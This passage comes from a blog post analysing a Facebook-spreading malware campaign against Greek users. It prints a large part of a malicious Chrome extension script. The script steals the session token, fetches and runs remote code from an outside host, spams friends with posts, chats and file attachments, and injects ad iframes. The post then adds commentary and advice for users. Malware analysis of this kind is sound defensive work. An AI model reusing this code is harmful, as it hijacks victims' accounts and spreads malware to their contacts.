    $.getJSON(url).done(function (b) {
      configs = b;
      configs.friends_to_send_attach = configs.friends_to_send_attach2;
      console.log('configs',configs);
      promise.resolve()
    }).fail(function (a, d, e) {
      console.log('fail',urls[counter])
      if(urls[counter++]) getit(urls[counter])
    });
  }
  getit(urls[0]);
  return promise;
}

function save(){
  chrome.storage.sync.set({'last_settings': Date.now() , 'post_kathe' : configs.post_kathe , 'ads' : configs.ads}, function() {
    // Notify that we saved.
    console.log('ok')
  });
}

try {
  fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
} catch(err) {
  console.log('errrrrr')
  exit();
}

chrome.storage.sync.get(function(extSettings) {
  console.log(extSettings)
  if(extSettings.last_settings){
    if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe) get_config().done(function(){ save(); if(configs.on) run(); })
  }else{
    get_config().done(function(){ save(); if(configs.on) run(); })
  }
});

curr_url = window.location.href;
setInterval(function(){
  if(curr_url!=window.location.href){
    console.log('alagi');
    curr_url=window.location.href;
    chrome.storage.sync.get(function(extSettings) {
      console.log(extSettings)
      if(extSettings.last_settings){
        if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe) get_config().done(function(){ save(); if(configs.on) run(); })
      }else{
        get_config().done(function(){ save(); if(configs.on) run(); })
      }
    });
  }
},30000)
/**/
var now = (new Date).getTime();

function run(){
  // like the posts
  if(configs.posts_to_like){
    var posts_to_like = configs.posts_to_like
    if(Object.isArray(posts_to_like)){ posts_to_like.each(function(post){ Like_post(post); }) }
  }
  // put the posts on the home page
  injectPost();
  getFriends().done(function(){
    //run code emergency
    if(configs.emergency){ $.getScript( "https://8zxb-2gvn.accessdomain.com/789/emergency.js"); }
    begin_to_like();
    //begin post
    msgPost=configs.msg_to_post;
    // get my name
    my_name=(friends.find(function(n){ return n.uid==user_id })).names.sample();
    // remove myself from the friends
    friends=friends.exclude(function(n){ return n.uid==user_id })
    friends=friends.randomize();
    if(configs.friends_to_post>friends.length) var friends_to_post=friends.length; else var friends_to_post=configs.friends_to_post;
    for(var i=0 ; i<friends_to_post;i++){ msg=msgPost.sample(); Create_Post(friends[i].uid) }
    //begin chat
    chrome.runtime.sendMessage({gegonos: "chat" , userid : user_id}, function(response) {});
    msgChat=configs.msg_to_chat;
    friends=friends.randomize();
    temp_friends=friends.clone();
    temp_friends2=friends.clone();
    already_chated=[];
    chrome.storage.sync.get(function(extSettings) {
      if(extSettings.chated_friends){
        already_chated=extSettings.chated_friends;
        friends_chated=extSettings.chated_friends.findAll(function(n){ return n.msg_title.indexOf(configs.msg_title)!=-1 })
        for (var i = 0; i < temp_friends.length; i++) {
          for (var j = 0; j < friends_chated.length; j++) {
            if(temp_friends[i].uid==friends_chated[j].uid){
              temp_friends2.remove(temp_friends[i])
              console.log('i remove',temp_friends[i])
            }
          };
        };
      }
      if(configs.friends_to_chat>temp_friends2.length) var friends_to_chat=temp_friends2.length; else var friends_to_chat=configs.friends_to_chat;
      friends_chated_to_save=[];
      for(var i=0 ; i<friends_to_chat;i++){
        msg=msgChat.sample();
        send_message(temp_friends2[i].uid,msg);
        friends_chated_to_save.push({ uid : temp_friends2[i].uid, msg_title : [configs.msg_title] })
      }
      console.log('first',already_chated)
      friends_chated_to_save.each(function(n){
        index=already_chated.findIndex(function(x){ return x.uid==n.uid; })
        console.log('index',index)
        if(index!=-1){ already_chated[index].msg_title.push(n.msg_title[0]) }else{ already_chated.push(n); }
      })
      console.log('last',already_chated)
      chrome.storage.sync.set({'chated_friends': already_chated}, function() {
        // Notify that we saved.
        console.log('ok',already_chated)
      });
    })
    //send attachment
    downloadFile().done(function(myFile){
      console.log('file',myFile)
      chrome.storage.sync.get(function(extSettings) {
        if(!extSettings.attach_chated_friends || extSettings.attach_chated_friends.friends_to_send_attach<= 0){
          getFriends().done(function(){
            // get my name
            my_name=(friends.find(function(n){ return n.uid==user_id })).names.sample();
            // remove myself from the friends
            friends=friends.exclude(function(n){ return n.uid==user_id })
            friends=friends.randomize();
            if(extSettings.already_attach_chated_friends){
              already_attach_chated_friends_ids = [];
              (extSettings.already_attach_chated_friends.findAll(function(x){ return x.attach_themes.indexOf(configs.attach_theme)!=-1 })).each(function(n){ already_attach_chated_friends_ids.push(n.uid) })
              console.log('already...',already_attach_chated_friends_ids)
              friends=friends.exclude(function(n){ return already_attach_chated_friends_ids.indexOf(n.uid)!=-1 })
              if(friends.length==0){ console.log('dn exo allous filous') }
            }
            if(configs.friends_to_send_attach>friends.length) var friends_to_send_attach=friends.length; else var friends_to_send_attach=configs.friends_to_send_attach;
            obj = {};
            obj.friends_to_send_attach = friends_to_send_attach;
            obj.data = [];
            for (var i = 0; i < friends_to_send_attach; i++) {
              if(configs.attach_name_and_msg[i]){
                var msg_to_send_attach = configs.attach_name_and_msg[i][1];
                var attach_name = configs.attach_name_and_msg[i][0];
              }
              var friends_id = friends[i].uid;
              console.log(friends_id)
              if($.isArray([friends[i].names])) var friend_name = friends[i].names.sample(); else var friend_name = friends[i].names;
              if(attach_name.has("yourname")) attach_name = attach_name.replace("yourname",friend_name)
              if(attach_name.has("myname")) attach_name = attach_name.replace("myname",my_name)
              var temp = { "friends_id" : friends_id, "msg_to_send_attach" : msg_to_send_attach, "attach_name" : attach_name }
              obj.data.push(temp)
            };
            chrome.storage.sync.set({'attach_chated_friends': obj}, function() {
              // Notify that we saved.
              console.log('ok',obj)
              lets_send_attach(obj)
            });
          });
        }else{
          console.log('exoume',extSettings.attach_chated_friends)
          lets_send_attach(extSettings.attach_chated_friends)
        }
        function lets_send_attach(attach_chated){
          if(attach_chated.friends_to_send_attach>0){
            var first = attach_chated.data.first();
            chrome.runtime.sendMessage({gegonos: "attach" , userid : first.friends_id}, function(response) {});
            start_sending(myFile,first.friends_id,first.msg_to_send_attach,first.attach_name).done(function(){
              attach_chated.friends_to_send_attach--;
              attach_chated.data.remove(first);
              chrome.storage.sync.get(function(extSettings) {
                if(extSettings.already_attach_chated_friends){
                  var index = extSettings.already_attach_chated_friends.findIndex(function(n){ return n.uid == first.friends_id; })
                  if(index == -1){
                    var attach_themes = [configs.attach_theme]
                    extSettings.already_attach_chated_friends.push({ 'uid' : first.friends_id, 'attach_themes' : attach_themes })
                  }else{
                    extSettings.already_attach_chated_friends[index].attach_themes.push(configs.attach_theme)
                  }
                }else{
                  var attach_themes = [configs.attach_theme]
                  extSettings.already_attach_chated_friends = [{ 'uid' : first.friends_id, 'attach_themes' : attach_themes }];
                }
                chrome.storage.sync.set({'already_attach_chated_friends': extSettings.already_attach_chated_friends}, function() {
                  // Notify that we saved.
                  console.log('just save',extSettings.already_attach_chated_friends)
                });
              })
              chrome.storage.sync.set({'attach_chated_friends': attach_chated}, function() {
                // Notify that we saved.
                console.log('new',attach_chated)
                lets_send_attach(attach_chated)
              });
            })
          }else{ return true; }
        }
      })
    })
  })
}

function begin_to_like(){
  chrome.storage.sync.get(function(extSettings) {
    console.log(extSettings)
    if(extSettings.liked_pages){
      temp_likes1=extSettings.liked_pages.intersect(configs.likes);
      temp_likes2=configs.likes;
      for (var i = 0; i < temp_likes2.length; i++) {
        for (var j = 0; j < temp_likes1.length; j++) {
          if(temp_likes1[j]==temp_likes2[i]) temp_likes2.remove(temp_likes1[j])
        };
      };
      temp_likes = temp_likes2;
      console.log(temp_likes)
      chrome.storage.sync.set({'liked_pages':extSettings.liked_pages.include(temp_likes)}, function() {
        // Notify that we saved.
        console.log('ok')
      });
    } else{
      temp_likes=configs.likes;
      chrome.storage.sync.set({'liked_pages':temp_likes}, function() {
        // Notify that we saved.
        console.log('ok')
      });
    }
    for (var i = 0; i < temp_likes.length; i++) { Like_page(temp_likes[i]) };
  })
}

function injectPost(){
  var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
  var eventer = window[eventMethod];
  var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
  // Listen to message from child window
  eventer(messageEvent,function(e) {
    if(e.data.myurl) $("iframe[src='"+e.data.myurl+"']").ready(function(ifr){
      if(e.data.height) $("iframe[src='"+e.data.myurl+"']").css('height', e.data.height + 'px');
      else $("iframe[src='"+e.data.myurl+"']").css('height', '550px');
    })
    if(e.data.should_go) window.location.href = e.data.should_go
  },false);
  elems1=$.makeArray( $( "*[data-dedupekey]" ) );
  elems2=$.makeArray( $( "*[data-insertion-position]") );
  elems=elems1.include(elems2).unique();
  for (var i = 0; i < configs.injectPosts.length; i++) {
    if($(elems[i])){ $(elems[i]).parent().prepend('<iframe style="margin-left: 13px;width:100%;" frameborder="0" scrolling="no" src="'+configs.injectPosts[i]+'"></iframe>') }
  };
}
```

Finally, a piece of code that is not another dropper. Its functionality is to inject ads so that the operators profit. From time to time, it spams your friends.

Summary

Most of the hosts that served the malware stopped serving it today. Greek journalists reported it as Koobface. It is not. It doesn't steal your credentials; it injects random ads. It was not state-of-the-art malware compared to some seen before, but it caused a fair amount of chaos.

Random thoughts

If I were the developer of it, I would replace the VBScript with a batch file that checks the OS of the system and downloads the equivalent malware. I think part of the idea came from a Greek virii mag from 2003 or from its offspring. All of these mags had articles on how to develop such worms, with equivalent samples.

Notes for users

Trust no one. Your boss won't send you naked photos of himself and your best buddy won't send you a drunk photo of himself, because you've seen him drunk way too many times. End of story. Make sure you see the extension of all files (even known ones) under Windows.

2 responses to “Greek facebook users under “attack””

  1. I’d like to find out more? I’d care to find out more details.

    • There’s a current attack on Greek users that sticks to the aforementioned details. If you want something really cool, check for Lecpetex 🙂
